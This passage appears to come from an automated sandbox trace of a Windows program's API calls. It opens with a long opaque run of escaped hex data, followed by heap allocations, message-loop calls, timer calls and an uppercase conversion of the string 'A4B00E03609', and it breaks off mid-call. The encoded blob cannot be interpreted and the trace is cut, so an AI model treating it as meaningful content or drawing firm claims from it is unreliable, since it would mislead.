c\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0268.220] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0268.220] TranslateMessage (lpMsg=0x8bf970) returned 0 [0268.220] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0268.220] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0268.220] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0268.220] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0268.220] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0268.220] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0268.222] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0268.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0268.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0268.222] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0268.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0268.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0268.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0268.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0268.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0268.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0268.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0268.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0268.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0268.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0268.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0268.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0268.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0268.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 